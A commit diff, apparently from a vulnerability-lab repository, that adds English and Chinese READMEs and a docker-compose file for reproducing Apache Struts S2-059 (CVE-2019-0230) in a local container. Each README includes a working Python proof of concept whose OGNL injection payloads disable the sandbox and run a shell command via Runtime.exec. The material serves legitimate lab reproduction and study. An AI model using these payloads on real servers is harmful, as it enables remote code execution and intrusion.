first commit

struts2/s2-059/README.md

@@ -0,0 +1,52 @@
+# Struts2 S2-059 Remote Code Execution Vulnerablity(CVE-2019-0230)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
+
+Affected Version: Struts 2.0.0 - Struts 2.5.20
+
+References:
+
+- https://cwiki.apache.org/confluence/display/WW/S2-059
+- https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776
+
+## Setup
+
+Start the Struts 2.5.16 environment:
+
+```
+docker compose up -d
+```
+
+After the environment is started, visit `http://your-ip:8080/?id=1` and you will see the Struts2 test page.
+
+## Exploit
+
+visit `http://your-ip:8080/?id=%25%7B233*233%7D`, it can be seen that the result of 233*233 has been returned in the id attribute.
+
+![1.png](1.png)
+
+[OGNL Apache Struts exploit: Weaponizing a sandbox bypass (CVE-2018-11776)](https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776) gives the details of OGNL sandbox bypass in Struts 2.5.16.
+
+A simple Python POC for Verifying the vulnerability:
+
+```python
+import requests
+
+url = "http://127.0.0.1:8080"
+data1 = {
+    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
+}
+data2 = {
+    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
+}
+res1 = requests.post(url, data=data1)
+# print(res1.text)
+res2 = requests.post(url, data=data2)
+# print(res2.text)
+```
+
+Execute the poc and the `touch /tmp/success` command has been executed:
+
+![2.png](2.png)

struts2/s2-059/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
+
+Apache Struts框架, 会对某些特定的标签的属性值，比如id属性进行二次解析，所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式，造成OGNL表达式注入。从而可能造成远程执行代码。
+
+影响版本: Struts 2.0.0 - Struts 2.5.20
+
+参考链接：
+
+- https://cwiki.apache.org/confluence/display/WW/S2-059
+- https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776
+
+## 漏洞环境
+
+启动 Struts 2.5.16环境:
+
+```
+docker compose up -d
+```
+
+启动环境之后访问`http://your-ip:8080/?id=1` 就可以看到测试界面
+
+## 漏洞复现
+
+访问 `http://your-ip:8080/?id=%25%7B233*233%7D`，可以发现233*233的结果被解析到了id属性中：
+
+![1.png](1.png)
+
+《[OGNL Apache Struts exploit: Weaponizing a sandbox bypass (CVE-2018-11776)](https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776)》给出了绕过struts2.5.16版本的沙盒的poc，利用这个poc可以达到执行系统命令。
+
+通过如下Python脚本复现漏洞：
+
+```python
+import requests
+
+url = "http://127.0.0.1:8080"
+data1 = {
+    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
+}
+data2 = {
+    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
+}
+res1 = requests.post(url, data=data1)
+# print(res1.text)
+res2 = requests.post(url, data=data2)
+# print(res2.text)
+```
+
+执行poc之后，进入容器发现`touch /tmp/success`已成功执行。
+
+![2.png](2.png)

struts2/s2-059/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ struts2:
+   image: vulhub/struts2:2.5.16
+   ports:
+    - "8080:8080"